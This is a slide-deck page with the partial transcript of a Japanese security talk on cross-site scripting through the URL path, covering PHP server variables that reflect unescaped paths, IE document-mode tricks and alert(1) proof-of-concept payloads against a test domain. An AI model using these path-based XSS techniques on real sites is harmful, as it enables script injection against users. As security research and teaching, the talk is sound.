明日から使える?! PATHでXSSする技術/ Shibuya.XSS techtalk #7

1a5bce24526a7d6f1ab89678df2d673c?s=47 Masato Kinugawa
March 29, 2016
Technology
14
21k

明日から使える?! PATHでXSSする技術/ Shibuya.XSS techtalk #7

Shibuya.XSS techtalk #7 の資料です。

1a5bce24526a7d6f1ab89678df2d673c?s=128

Masato Kinugawa

March 29, 2016
Tweet

More Decks by Masato Kinugawa

See All by Masato Kinugawa
1a5bce24526a7d6f1ab89678df2d673c?s=48 masatokinugawa
21
4.8k
1a5bce24526a7d6f1ab89678df2d673c?s=48 masatokinugawa
5
59k
1a5bce24526a7d6f1ab89678df2d673c?s=48 masatokinugawa
9
7.2k
1a5bce24526a7d6f1ab89678df2d673c?s=48 masatokinugawa
17
10k
1a5bce24526a7d6f1ab89678df2d673c?s=48 masatokinugawa
35
17k
1a5bce24526a7d6f1ab89678df2d673c?s=48 masatokinugawa
2
1.3k
1a5bce24526a7d6f1ab89678df2d673c?s=48 masatokinugawa
21
19k
1a5bce24526a7d6f1ab89678df2d673c?s=48 masatokinugawa
4
2.1k
1a5bce24526a7d6f1ab89678df2d673c?s=48 masatokinugawa
7
2.1k

Other Decks in Technology

See All in Technology
B2a04c1ec959edba430bcb38ca6ffc81?s=48 corestate55
0
260
332f89cc697355902a817506b6995f2b?s=48 ytaka23
0
380
A581dece94e3a97b391d3d17b10cf084?s=48 fnario
0
150
8aba6de431668fc8d09977c0e33c63c1?s=48 jaguar_imo
0
160
E369844a542e163df02efff8c8085782?s=48 yastani
2
160
74cec195bfb6cb5165256d88cb7fcf0f?s=48 miu_crescent
2
260
Ccb58352bdd1be66ebb2daf12ba1b993?s=48 mirie_sd
0
340
0620564f0125b8b3b7f4fe40c10b8b4e?s=48 tattn
4
860
9e7a653ed313b3da4b263a772bfc5026?s=48 clustervr
0
180
Ecad9d801d79f6c6e5df93094690685e?s=48 sinsoku
6
2.2k
E91a24de5f8858932171b35bd47c8485?s=48 rueian
0
240
1dc713fe291d5746d6646e45391326a9?s=48 nottegra
0
190

Featured

See All Featured
3d4519fd34b76fb265fc0237f3792bd4?s=48 danielanewman
197
19k
C157b16234f1e75e8eac3698c1d4414a?s=48 ddemaree
273
31k
A60068bce2e73de3a37ca9d2dbe36092?s=48 bryan
100
11k
11c84dff30266b907714802088852677?s=48 jasonvnalue
80
7.9k
06f8b41980eb4c577fa40c41d5030c19?s=48 keathley
15
530
4394ceb8b277f35ee3da7030384efb5d?s=48 davidbonilla
69
3.5k
C7393b7ba7ec9c8890dd77d209fbb3c9?s=48 maltzj
499
36k
462dad0dd24c568a32dcdb0ae895ae1b?s=48 rasmusluckow
316
18k
282d599b414022eba5096510f675b6e2?s=48 chrislema
231
16k
C4de88ea47538e4594750e3861a341c8?s=48 brettharned
92
2.8k
32de0bd2ba869609d26fd052a4622778?s=48 cromwellryan
101
5.8k
A415db3ac9e9668acbc1fb36eead84ac?s=48 mthomps
37
2.2k

Transcript

  1. None
  2. None
  3. None
  4. None
  5. None

  6. https://host/tags/aaa/ ... </head> <body> <form> <input type="text" value="aaa"> ...

  7. ... </head> <meta property="og:url" content="https://host/path/index"> <body> ... https://host/path/index?p=1

  8. ... </head> <meta property="og:url" content="https://host/path/index;aaa"> <body> ... https://host/path/index;aaa?p=1

  9. None

  10. http://php.net/index.php http://php.net/index.php/xxx/yyy/zzz

  11. http://shibuyaxss.connpass.com/event/28232/ http://shibuyaxss.connpass.com/event/28232/;abc

  12. None

  13. SCRIPT_URL /test.php/<b>PATH</b> SCRIPT_URI http://localhost/test.php/<b>PATH</b> PATH_INFO /<b>PATH</b> PATH_TRANSLATED \<b>PATH<\b> PHP_SELF /test.php/<b>PATH</b>

  14. GET /path?query HTTP/1.1 http://php.net/manual/ja/reserved.variables.server.php

  15. /test.php/<b>PATH</b>?<b>QUERY</b> GET /test.php/%3Cb%3EPATH%3C/b%3E?%3Cb%3EQUERY% 3C/b%3E HTTP/1.1 QUERY_STRING %3Cb%3EQUERY%3C/b%3E REQUEST_URI /test.php/%3Cb%3EPATH%3C/b%3E? %3Cb%3EQUERY%3C/b%3E

    http://localhost/test.php/<b>PATH</b>?<b>QUERY</b>

  16. /test.php/%3Cb%3EPATH%3C/b%3E?<b>QUERY</b> GET /test.php/%3Cb%3EPATH%3C/b%3E?<b>QUERY</b> HTTP/1.1 QUERY_STRING <b>QUERY</b> REQUEST_URI /test.php/%3Cb%3EPATH%3C/b%3E?<b>QUERY</b> http://localhost/test.php/<b>PATH</b>?<b>QUERY</b>

  17. http://localhost/test.php/<b>PATH</b> GET /test.php/<b>PATH</b> HTTP/1.1

  18. /test.php/%3Cb%3EPATH%3C/b%3E GET /test.php/<b>PATH</b> HTTP/1.1 REQUEST_URI /test.php/<b>PATH</b> location.pathname /test.php/%3Cb%3EPATH%3C/b%3E http://localhost/test.php/<b>PATH</b>

  19. None
  20. None
  21. None
  22. None
  23. None
  24. None
  25. None
  26. None
  27. None
  28. None
  29. None
  30. None
  31. None
  32. None
  33. None

  34. HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 X-UA-Compatible: IE=9 <head> <meta

    http-equiv="X-UA-Compatible" content="IE=9"> </head>

  35. <svg> <circle cx="100" cy="100" r="50" fill="red"/> </svg>

  36. ifr=document.createElement('<iframe onload=alert(1)>'); document.body.appendChild(ifr); InvalidCharacterError

  37. <meta http-equiv="X-UA-Compatible" content="IE=9"> <script> console.log(document.documentMode) /* 9 */ </script> <iframe

    src=//victim/></iframe> http://blogs.msdn.com/cfs-filesystemfile.ashx/__key/communityserver-blogs-components- weblogfiles/00-00-01-35-07/3073.IE_5F00_chart_5F00_jp.pdf

  38. <meta http-equiv="X-UA-Compatible" content="IE=9"> <embed src="http://shibuya.vulnerabledoma.in/javascript:alert(1)/% 2F..%2F..%2Fjizen2#hash"></embed>

  39. <script src="//ajax.googleapis.com/ajax/libs/jquerymobile/1.4.5/jquery.mobile.min.js"> </script>

  40. None
  41. None
  42. None
  43. None
  44. None
  45. None
  46. None
  47. None
  48. None
  49. None
  50. None
  51. None
  52. None